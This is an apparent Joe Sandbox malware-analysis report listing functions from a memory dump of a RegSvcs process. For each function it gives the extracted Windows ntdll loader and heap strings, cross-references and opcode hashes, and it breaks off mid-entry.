String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 7282cd87fa6d5bbcad417b4b7ccf8e8e35449832aa4eba90609bc1f8237328f1
Instruction ID: 93d9f2965b1fd4015263d643c734ef2d3d22632b52577008b110e9d3afe96f6a
Opcode Fuzzy Hash: 7282cd87fa6d5bbcad417b4b7ccf8e8e35449832aa4eba90609bc1f8237328f1
Instruction Fuzzy Hash: 5E71D2B19043059FCB21DF18C8C4B97BFA8AF94764F540468FA488B28AD734D698CFD2

Function 017D245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 017D2462
LdrpDynamicShimModule, xrefs: 0181A998
minkernel\ntdll\ldrinit.c, xrefs: 0181A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0181A992

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 32947daee22b03b198702a8ffe045189e18598999bb977a11fb3f9fe1275d7d3
Instruction ID: a290f80d317401b25f63cfbcd8324103d1686457f58720dc4a00d31d5355d986
Opcode Fuzzy Hash: 32947daee22b03b198702a8ffe045189e18598999bb977a11fb3f9fe1275d7d3
Instruction Fuzzy Hash: 6E312872600241ABEB359F5DD885E7AFBB9FB80B04F654019F911E724ED7B05B81CB80

Function 017C29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 017C3255
HEAP: , xrefs: 017C3264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017C327D

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: c2db3fbabae5019719c2b973f19ea32a5969d9f6d836b9a2d97d68e56d1e22b5
Instruction ID: 4f0a8609fc15adf41e8f9eb3fba3b188dd870a47e6f88ff85597e1a2c0294434
Opcode Fuzzy Hash: c2db3fbabae5019719c2b973f19ea32a5969d9f6d836b9a2d97d68e56d1e22b5
Instruction Fuzzy Hash: 1E929A71A046499FEB25CF68C444BAEFBF1BF48B00F18809DE859AB392D735A941CF50

Function 017C0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 018150BD
HEAP[%wZ]: , xrefs: 018150AE
(UCRBlock->Size >= *Size), xrefs: 018150CA

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 071540aa11f82a4bec860902f0888547c88f8efe3a394538fe22ff8c66979c4b
Instruction ID: ea57db1701d5e40918235b165ad985b8a3345647d892fa0df2c7d02cc3705a17
Opcode Fuzzy Hash: 071540aa11f82a4bec860902f0888547c88f8efe3a394538fe22ff8c66979c4b
Instruction Fuzzy Hash: 34F1AB35600606DFEB25CF68C894BAAF7B9FB85704F1481ACE516DB385D730EA81CB91

Function 017D6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 017D6C24
, xrefs: 0181CA51

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: eb6d1f1b6cdd7c3a7b1d1795f5db6ebc9a77189511c8cced507f7fd6410e6ab7
Instruction ID: bbc8d825e41cbd10c467f47acea707302c453e202ac7873632f53d4dffa7186d
Opcode Fuzzy Hash: eb6d1f1b6cdd7c3a7b1d1795f5db6ebc9a77189511c8cced507f7fd6410e6ab7
Instruction Fuzzy Hash: D5C26B726083459FDB29CF28C881BABFBF5AF88718F04896DF989C7245D734D9448B52

Function 017AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0180C2E6
UseFilter, xrefs: 017AA1C1
\??\, xrefs: 0180C1E4

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 796f06914484633dda64b546a9f5af40e85fdd5f9a5ef3f0f98fb450936c8c67
Instruction ID: 536609047caee4ded8262ddbd6536dccc00c5ae37475f053c824e956d73e307b
Opcode Fuzzy Hash: 796f06914484633dda64b546a9f5af40e85fdd5f9a5ef3f0f98fb450936c8c67
Instruction Fuzzy Hash: 64A17C719116299BDB329F64CC88BAAF7B8EF44700F1102E9EA08E7291D7359F84CF50

Function 017D0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0181A117
minkernel\ntdll\ldrinit.c, xrefs: 0181A121
Failed to allocated memory for shimmed module list, xrefs: 0181A10F

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: b20328a8eeab64e7a5931755ecab0a938e0e0b3a9f9353762eb03dd2aef37bbe
Instruction ID: e25b97ea525ac959f1899687ae72af909dea437e691c7240a16f52a2adc575a0
Opcode Fuzzy Hash: b20328a8eeab64e7a5931755ecab0a938e0e0b3a9f9353762eb03dd2aef37bbe
Instruction Fuzzy Hash: B271D271A00209DFDB29DF68C984ABEF7F4FB44704F18406DE906EB259E774AA81CB50

Function 017C0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01815335
HEAP: , xrefs: 01815342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0181534D

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 18400ac2fb6120a4c1b5d6c66127b914ce9ef3545770c62662890c8957b72f57
Instruction ID: a6d0ee3f82dd8ab731199353668b216f228875211ec86792f0651fad8f0861ff
Opcode Fuzzy Hash: 18400ac2fb6120a4c1b5d6c66127b914ce9ef3545770c62662890c8957b72f57
Instruction Fuzzy Hash: D361AB75600305DFDB29CF28C880B6AFBA5FF46B04F14859EE4598B296D770E981CB91

Function 017EC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 018282DE
Failed to reallocate the system dirs string !, xrefs: 018282D7
minkernel\ntdll\ldrinit.c, xrefs: 018282E8

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: f08f4b0c8d731b6ebbb3d19bae88248c821a48af0d1ce5d837d32f3f30fcdbdf
Instruction ID: 0421079dfcf5c0224e356f1a7f44e76cf6a2c0d0e58173264d225ef3fa40c72c
Opcode Fuzzy Hash: f08f4b0c8d731b6ebbb3d19bae88248c821a48af0d1ce5d837d32f3f30fcdbdf
Instruction Fuzzy Hash: 00415375584301ABE722EB68DC48B5BBBE8EF49B50F44482EF944C3298E734DA00CB91

Function 0186C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 0186C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0186C1C5
PreferredUILanguages, xrefs: 0186C212

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: f64fb2433e210b39c4cb95c2c66d8734846ea72b91b4bb8bd6a65905e8c87f1f
Instruction ID: 53cd7867ec7f5b3c9b8d8610653b7bb30b037cfcfc00a53128c08f13a4dab7b0
Opcode Fuzzy Hash: f64fb2433e210b39c4cb95c2c66d8734846ea72b91b4bb8bd6a65905e8c87f1f
Instruction Fuzzy Hash: 69416F72E0020EEBDB11DAD8C895FEEFBBDAB14704F14416AEA49E7380D7749B448B50

Function 01844144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01844172
@, xrefs: 01844225
LdrpResValidateFilePath Enter, xrefs: 01844160

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: b6aed1ad039ff1c58de8224f470ce833b20967541cdf1fe2f508fcf915e51699
Instruction ID: 382a8e60c77fccd2b89e73c69889c1bb5bf98fc277f86cf2d2c56081b1d67e2c
Opcode Fuzzy Hash: b6aed1ad039ff1c58de8224f470ce833b20967541cdf1fe2f508fcf915e51699
Instruction Fuzzy Hash: 6A412271A0065C8BEB26DBE8C844BADBBB8FF55744F14045ADA01FB781DF358A01CB51

Function 01834755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01834888
minkernel\ntdll\ldrredirect.c, xrefs: 01834899
LdrpCheckRedirection, xrefs: 0183488F

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 3646ffb7671c98fcc5f86816578faffcae9bf0ef1a0b3afd88f575ab830d0a3d
Instruction ID: b4bf2a009dcd1f77e3b9cc0f852e68da1737b231cba86cda6289eef326c7ec02
Opcode Fuzzy Hash: 3646ffb7671c98fcc5f86816578faffcae9bf0ef1a0b3afd88f575ab830d0a3d
Instruction Fuzzy Hash: 9841EF32A146559FDB22CF2DD840A26BBE4AFC9B50B0D066DED49DB311E730EA00CBD1

Function 017C0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01815431
HEAP: , xrefs: 0181543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01815449

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 080e476ed92d0cd3b21ee90ad4d79ae07fd8e995c8cbd45b42fc31368367c76a
Instruction ID: 0ec63304a4cecf0afc7af1cf6acc724e92eb5265b0c6e8e574b6853035adcdf2
Opcode Fuzzy Hash: 080e476ed92d0cd3b21ee90ad4d79ae07fd8e995c8cbd45b42fc31368367c76a
Instruction Fuzzy Hash: 4011D276394141DFD729DE18C894B66F3A8EF81B15F18815DF406CB259DB30D980CB91

Function 018320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 018320FA
Process initialization failed with status 0x%08lx, xrefs: 018320F3
minkernel\ntdll\ldrinit.c, xrefs: 01832104

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 9a50290efe09717c780a88f9c5970a0fb2603323eab5f15e29ec8dc70504b189
Instruction ID: b01e24dbd1c30e1aa45023df919e33bed8dd1826878278926765bb1322f3d83d
Opcode Fuzzy Hash: 9a50290efe09717c780a88f9c5970a0fb2603323eab5f15e29ec8dc70504b189
Instruction Fuzzy Hash: DBF04C74680308BBEB20E60CDD16F9ABB68FB80B14F540068FB00BB285D1B0B744CAC1

Function 017C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01814D8A

Strings

#%u, xrefs: 01814D82

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 0f63952b96acb44e277348f28d3f149d6c98a09ce1419a88d7c9802da29c8df7
Instruction ID: 17977bec7da02e40e4ac6db8c4428342a37d7a4690ee094e13159a07cd0cc85a
Opcode Fuzzy Hash: 0f63952b96acb44e277348f28d3f149d6c98a09ce1419a88d7c9802da29c8df7
Instruction Fuzzy Hash: 22713972A0014A9FDB05DFA8C994BAEB7F8BF08704F144069E905E7255EB34EE41CBA1

Function 017BA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 017BAA13
LdrResSearchResource Exit, xrefs: 017BAA25

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: a835905091f5fe554d9068245eb54522f615882c5257bf4ce48a5684100bc30b
Instruction ID: 46141ef3cbe6238724ced8c920fc983bb6d01115171be770a0d00e8c64a7f966
Opcode Fuzzy Hash: a835905091f5fe554d9068245eb54522f615882c5257bf4ce48a5684100bc30b
Instruction Fuzzy Hash: 2EE17172E00219AFEF22DE99C984BEEFBBAFF14310F144469E911E7255D7749A40CB50

Function 0187A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0187A44B
`, xrefs: 0187A551

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 2ea4ec7b7743cebad98921c57583598acfbf35efd857b9b5e59b55f308855d94
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: ADC1E2312043429BE728CF28C845B6FBBE5AFC4358F184A2CF696CB290D775D605CB42

Function 0182E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0182E751
Legacy, xrefs: 0182E75A

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: adfeab5ed641e22ff21484abcfeb7f99be978a1d8be90c83334abbd9f87d7d79
Instruction ID: 3e97879afcc7a061e6019c7eb8580bb87560e910a572fca29b52d93dbc4f586f
Opcode Fuzzy Hash: adfeab5ed641e22ff21484abcfeb7f99be978a1d8be90c83334abbd9f87d7d79
Instruction Fuzzy Hash: 6C618F71E003199FDB15DFA9C840BAEBBB5FB48704F14406DE689EB281D771AA80CB54

Function 018543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01854437
MUI, xrefs: 01854525

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 7b22b4ad24f4e4e49e9ffdf0ad4ef659a79fcbf1e4b2163cb3b5cfd1cd1d2076
Instruction ID: 48fb60f8677acac002e93cf78d94c3a2de9f1966d5831768bc58b94f92e7aacd
Opcode Fuzzy Hash: 7b22b4ad24f4e4e49e9ffdf0ad4ef659a79fcbf1e4b2163cb3b5cfd1cd1d2076
Instruction Fuzzy Hash: 1A511671E0021DAEDB11DFA9CC94AEFBBB9EB44758F100529EA11F7291E6309A45CB60

Function 017B04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 017B0540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017B063D

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 38337f5dfd3a57cea4d368ca3020719d0cd3aaf784779c969e0ce38d2cb291b7
Instruction ID: c0c299ba6ceda07aadddbd38c8dd2589afb93c2de8b497931bcf5d00d8d80bef
Opcode Fuzzy Hash: 38337f5dfd3a57cea4d368ca3020719d0cd3aaf784779c969e0ce38d2cb291b7
Instruction Fuzzy Hash: B0517B715047428FD724EF68C584BE7FBF4AF84304F24483EE6AA87641E770A545CB92

Function 017BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 017BA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 017BA309

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 8a34a79b5fdb175a96b69ca8fc657c3795cb200ffd6016e459d0de62872e8730
Instruction ID: 2b8c5f154d8d47f059d130531ab1b437433c9077c6b14224288e65a397780c9d
Opcode Fuzzy Hash: 8a34a79b5fdb175a96b69ca8fc657c3795cb200ffd6016e459d0de62872e8730
Instruction Fuzzy Hash: A041E231A05649DBDB11EF5DC480FADBBB5FF84704F2440A9E900DB295E375DA40CB40

Function 017EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 017EA5E9
Cleanup Group, xrefs: 017EA5E4

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: e833b0547221b18ee2eae5b7306ca6571a34e9692c8f7aa828a0483efed64b39
Instruction ID: 51e8b0e0756003e5f3883888dd80b1d74b0136dda214d06f88cef3f1cc16aa6b
Opcode Fuzzy Hash: e833b0547221b18ee2eae5b7306ca6571a34e9692c8f7aa828a0483efed64b39
Instruction Fuzzy Hash: 5801DCB2240700AFE321DF24CE49B26B7F8FB89B25F058979A658C7194E334E904CB46

Function 017BC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 017BC8C3, 017BCA40

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 6f090545d54089a02082b864dedac1b0dbbe8ffcd5c15478ad2d83ca64e6f3fc
Instruction ID: ab53bfb326e7418eb7c0b987cf35985446405910b3788a35b96193fae41d4e94
Opcode Fuzzy Hash: 6f090545d54089a02082b864dedac1b0dbbe8ffcd5c15478ad2d83ca64e6f3fc
Instruction Fuzzy Hash: 43825A75E002198FEB25CFA9C8C4BEEFBB1BF48314F1481A9E959AB351D7349981CB50

Function 01836420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 018365C1

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9d3859bb4da096bb5a1fd2234332d59449c26fd64e3a8876aaa21c4924aaa254
Instruction ID: 6912541b55ef1bf22d8607f21426d263f15f48336c1de7bdc0e1054efee217ba
Opcode Fuzzy Hash: 9d3859bb4da096bb5a1fd2234332d59449c26fd64e3a8876aaa21c4924aaa254
Instruction Fuzzy Hash: D2916771900219BFEB21DB99CC85FAEBBB8EF54750F254065F600EB195E774AE00CBA1

Function 0185E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0185E1FA

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c6d39029ff712a02d8c39d711d39cedb6d8e10c82cc878b003eb487ebf8cff5c
Instruction ID: 5501b2b6b681ebc7c643f54be6d755a3e21771fa66250ccdc331d848e9aec8b4
Opcode Fuzzy Hash: c6d39029ff712a02d8c39d711d39cedb6d8e10c82cc878b003eb487ebf8cff5c
Instruction Fuzzy Hash: 0F918E32900609ABDB22ABA5DC48FEFFBB9EF45794F100029F905E7255EB349B05CB51

Function 017EA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 018267C9

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 2d6eae0ed774a42c7a06464027493c10c27b8f3f0faaad9d97ab9d577f873ce5
Instruction ID: c3bcd215dcf82dbcf0f468f2e1592741a4afd10e3f9a45d6f46b9eff9ce545ec
Opcode Fuzzy Hash: 2d6eae0ed774a42c7a06464027493c10c27b8f3f0faaad9d97ab9d577f873ce5
Instruction Fuzzy Hash: 937161B5E0021ADFDF25CF9CD590AADBBB1BF48710F24812AE905E7245F7719A81CB50

Function 01854978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01854A7F

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: f1b90fe0f0790ac9b7d1c1c5f12acfef2f1418a632fdc59c85fb435a18136591
Instruction ID: c2a488949fee25b3454057a38746796f91978b66c1e7391800d8c71687aa48e3
Opcode Fuzzy Hash: f1b90fe0f0790ac9b7d1c1c5f12acfef2f1418a632fdc59c85fb435a18136591
Instruction Fuzzy Hash: A8519372D0022A9BDB91DFA9D844AEEFBB4EF04B54F054129ED11FB250E7349A41CBE4

Function 017CE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 017CE6A4

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 7509dbfcd381d240959b0d6b76e5cff31fb3cafb5d51ee48f58b088b2b0017d2
Instruction ID: a8109cacec9b4967676b1c847fad8e648731ccdb248ae2aee594c30700109457
Opcode Fuzzy Hash: 7509dbfcd381d240959b0d6b76e5cff31fb3cafb5d51ee48f58b088b2b0017d2
Instruction Fuzzy Hash: 434182725083029BD721DA75D984B6FFBE8AF88F14F44092DFA84E7184EB74D904C796

Function 0182C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0182C77F

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 3d6f5fea3682e2de8721f45dc47a3b29bbe6780c1034ef85e611b46bcae42b58
Instruction ID: d8ff102b5cf35cba2340982f53e162fe8f281ee3ac50261a243870707c02cc1e
Opcode Fuzzy Hash: 3d6f5fea3682e2de8721f45dc47a3b29bbe6780c1034ef85e611b46bcae42b58
Instruction Fuzzy Hash: B54135B1D0052DABDB21DA54CC84FEEB77CAB45714F0085A5EB08E7141DB709F898FA5

Function 01846B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01846B91

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: c51886a7647e39aef4fad97a914f4de07b47305d491a054a9ef9676cb4527af1
Instruction ID: fe289196307a7f781f855c4148be73272ed97b5064339f501e8ab891e1beab80
Opcode Fuzzy Hash: c51886a7647e39aef4fad97a914f4de07b47305d491a054a9ef9676cb4527af1
Instruction Fuzzy Hash: 79312C31E0071D9BEB22CF68C844BAEBBA4DF06704F20402CE941DB282EB75DE45CB54

Function 0182CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0182CAA2

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 9d438beed78771caf05ce996956a8ad3c12af6df8e68744a40de3768b59de0e8
